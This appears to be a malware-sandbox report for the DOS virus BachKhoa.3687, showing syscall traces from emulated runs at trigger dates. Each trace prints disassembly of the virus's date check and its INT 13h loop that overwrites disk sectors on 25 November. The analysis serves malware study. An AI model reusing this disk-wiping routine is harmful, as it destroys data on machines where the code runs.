Sample viewer

vx.netlux.org/Virus.DOS.BachKhoa.3687

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:30:16.924248264Z	42	PC: 146c8 \| Get date 0x146c8: cmp dx, 0xb19 0x146cc: jne 0x146ef 0x146ce: mov dx, 0x180 0x146d1: mov cx, 2 0x146d4: mov ax, 0x30a 0x146d7: xor bx, bx 0x146d9: push cx 0x146da: push dx 0x146db: int 0x13 0x146dd: pop dx 0x146de: pop cx 0x146df: inc ch 0x146e1: cmp ch, 0xc8 0x146e4: jb 0x146d4 0x146e6: xor ch, ch 0x146e8: inc dh 0x146ea: cmp dh, 0x3c 0x146ed: jb 0x146d4 0x146ef: mov ah, 0x2b 0x146f1: popf
2018-12-17T22:30:16.927821706Z	43	PC: 14704 \| Set date
2018-12-17T22:30:16.944049551Z	42	PC: 15798 \| Get date 0x15798: cmp dx, 0xb19 0x1579c: jne 0x157bf 0x1579e: mov dx, 0x180 0x157a1: mov cx, 2 0x157a4: mov ax, 0x30a 0x157a7: xor bx, bx 0x157a9: push cx 0x157aa: push dx 0x157ab: int 0x13 0x157ad: pop dx 0x157ae: pop cx 0x157af: inc ch 0x157b1: cmp ch, 0xc8 0x157b4: jb 0x157a4 0x157b6: xor ch, ch 0x157b8: inc dh 0x157ba: cmp dh, 0x3c 0x157bd: jb 0x157a4 0x157bf: mov ah, 0x2b 0x157c1: popf
2018-12-17T22:30:16.946300099Z	43	PC: 157d4 \| Set date
2018-12-17T22:30:16.948426033Z	9	PC: 13b2c \| Display string (Could not find end pointer)
2018-12-17T22:30:16.954280932Z	76	PC: 13b31 \| Terminate with return code (Return code = '0')
2018-12-17T22:30:16.95752022Z	77	PC: 13856 \| Get program return code

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5412,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:54:27.594446659Z	42	PC: 146c8 \| Get date 0x146c8: cmp dx, 0xb19 0x146cc: jne 0x146ef 0x146ce: mov dx, 0x180 0x146d1: mov cx, 2 0x146d4: mov ax, 0x30a 0x146d7: xor bx, bx 0x146d9: push cx 0x146da: push dx 0x146db: int 0x13 0x146dd: pop dx 0x146de: pop cx 0x146df: inc ch 0x146e1: cmp ch, 0xc8 0x146e4: jb 0x146d4 0x146e6: xor ch, ch 0x146e8: inc dh 0x146ea: cmp dh, 0x3c 0x146ed: jb 0x146d4 0x146ef: mov ah, 0x2b 0x146f1: popf
2018-12-25T11:54:27.599083272Z	43	PC: 14704 \| Set date
2018-12-25T11:54:27.613662363Z	42	PC: 15798 \| Get date 0x15798: cmp dx, 0xb19 0x1579c: jne 0x157bf 0x1579e: mov dx, 0x180 0x157a1: mov cx, 2 0x157a4: mov ax, 0x30a 0x157a7: xor bx, bx 0x157a9: push cx 0x157aa: push dx 0x157ab: int 0x13 0x157ad: pop dx 0x157ae: pop cx 0x157af: inc ch 0x157b1: cmp ch, 0xc8 0x157b4: jb 0x157a4 0x157b6: xor ch, ch 0x157b8: inc dh 0x157ba: cmp dh, 0x3c 0x157bd: jb 0x157a4 0x157bf: mov ah, 0x2b 0x157c1: popf
2018-12-25T11:54:27.615274495Z	43	PC: 157d4 \| Set date
2018-12-25T11:54:27.617437297Z	9	PC: 13b2c \| Display string (Could not find end pointer)
2018-12-25T11:54:27.620987862Z	76	PC: 13b31 \| Terminate with return code (Return code = '0')
2018-12-25T11:54:27.623099222Z	77	PC: 13856 \| Get program return code

{"DateBased":true,"Day":25,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5412,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:54:27.931900307Z	42	PC: 146c8 \| Get date 0x146c8: cmp dx, 0xb19 0x146cc: jne 0x146ef 0x146ce: mov dx, 0x180 0x146d1: mov cx, 2 0x146d4: mov ax, 0x30a 0x146d7: xor bx, bx 0x146d9: push cx 0x146da: push dx 0x146db: int 0x13 0x146dd: pop dx 0x146de: pop cx 0x146df: inc ch 0x146e1: cmp ch, 0xc8 0x146e4: jb 0x146d4 0x146e6: xor ch, ch 0x146e8: inc dh 0x146ea: cmp dh, 0x3c 0x146ed: jb 0x146d4 0x146ef: mov ah, 0x2b 0x146f1: popf
2018-12-25T11:54:30.283030158Z	43	PC: 14704 \| Set date
2018-12-25T11:54:30.293506984Z	42	PC: 15798 \| Get date 0x15798: cmp dx, 0xb19 0x1579c: jne 0x157bf 0x1579e: mov dx, 0x180 0x157a1: mov cx, 2 0x157a4: mov ax, 0x30a 0x157a7: xor bx, bx 0x157a9: push cx 0x157aa: push dx 0x157ab: int 0x13 0x157ad: pop dx 0x157ae: pop cx 0x157af: inc ch 0x157b1: cmp ch, 0xc8 0x157b4: jb 0x157a4 0x157b6: xor ch, ch 0x157b8: inc dh 0x157ba: cmp dh, 0x3c 0x157bd: jb 0x157a4 0x157bf: mov ah, 0x2b 0x157c1: popf
2018-12-25T11:54:32.555104491Z	43	PC: 157d4 \| Set date
2018-12-25T11:54:32.558604182Z	9	PC: 13b2c \| Display string (Could not find end pointer)
2018-12-25T11:54:32.561963035Z	76	PC: 13b31 \| Terminate with return code (Return code = '0')
2018-12-25T11:54:32.563936776Z	77	PC: 13856 \| Get program return code

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5412,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:54:28.840989365Z	42	PC: 146c8 \| Get date 0x146c8: cmp dx, 0xb19 0x146cc: jne 0x146ef 0x146ce: mov dx, 0x180 0x146d1: mov cx, 2 0x146d4: mov ax, 0x30a 0x146d7: xor bx, bx 0x146d9: push cx 0x146da: push dx 0x146db: int 0x13 0x146dd: pop dx 0x146de: pop cx 0x146df: inc ch 0x146e1: cmp ch, 0xc8 0x146e4: jb 0x146d4 0x146e6: xor ch, ch 0x146e8: inc dh 0x146ea: cmp dh, 0x3c 0x146ed: jb 0x146d4 0x146ef: mov ah, 0x2b 0x146f1: popf
2018-12-25T11:54:28.843544155Z	43	PC: 14704 \| Set date
2018-12-25T11:54:28.861793621Z	42	PC: 15798 \| Get date 0x15798: cmp dx, 0xb19 0x1579c: jne 0x157bf 0x1579e: mov dx, 0x180 0x157a1: mov cx, 2 0x157a4: mov ax, 0x30a 0x157a7: xor bx, bx 0x157a9: push cx 0x157aa: push dx 0x157ab: int 0x13 0x157ad: pop dx 0x157ae: pop cx 0x157af: inc ch 0x157b1: cmp ch, 0xc8 0x157b4: jb 0x157a4 0x157b6: xor ch, ch 0x157b8: inc dh 0x157ba: cmp dh, 0x3c 0x157bd: jb 0x157a4 0x157bf: mov ah, 0x2b 0x157c1: popf
2018-12-25T11:54:28.864246287Z	43	PC: 157d4 \| Set date
2018-12-25T11:54:28.865822329Z	9	PC: 13b2c \| Display string (Could not find end pointer)
2018-12-25T11:54:28.872001853Z	76	PC: 13b31 \| Terminate with return code (Return code = '0')
2018-12-25T11:54:28.875273614Z	77	PC: 13856 \| Get program return code

{"DateBased":true,"Day":25,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5412,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:54:29.623144339Z	42	PC: 146c8 \| Get date 0x146c8: cmp dx, 0xb19 0x146cc: jne 0x146ef 0x146ce: mov dx, 0x180 0x146d1: mov cx, 2 0x146d4: mov ax, 0x30a 0x146d7: xor bx, bx 0x146d9: push cx 0x146da: push dx 0x146db: int 0x13 0x146dd: pop dx 0x146de: pop cx 0x146df: inc ch 0x146e1: cmp ch, 0xc8 0x146e4: jb 0x146d4 0x146e6: xor ch, ch 0x146e8: inc dh 0x146ea: cmp dh, 0x3c 0x146ed: jb 0x146d4 0x146ef: mov ah, 0x2b 0x146f1: popf
2018-12-25T11:54:31.683797883Z	43	PC: 14704 \| Set date
2018-12-25T11:54:31.703642943Z	42	PC: 15798 \| Get date 0x15798: cmp dx, 0xb19 0x1579c: jne 0x157bf 0x1579e: mov dx, 0x180 0x157a1: mov cx, 2 0x157a4: mov ax, 0x30a 0x157a7: xor bx, bx 0x157a9: push cx 0x157aa: push dx 0x157ab: int 0x13 0x157ad: pop dx 0x157ae: pop cx 0x157af: inc ch 0x157b1: cmp ch, 0xc8 0x157b4: jb 0x157a4 0x157b6: xor ch, ch 0x157b8: inc dh 0x157ba: cmp dh, 0x3c 0x157bd: jb 0x157a4 0x157bf: mov ah, 0x2b 0x157c1: popf
2018-12-25T11:54:33.480152479Z	43	PC: 157d4 \| Set date
2018-12-25T11:54:33.481804298Z	9	PC: 13b2c \| Display string (Could not find end pointer)
2018-12-25T11:54:33.488209646Z	76	PC: 13b31 \| Terminate with return code (Return code = '0')
2018-12-25T11:54:33.491680011Z	77	PC: 13856 \| Get program return code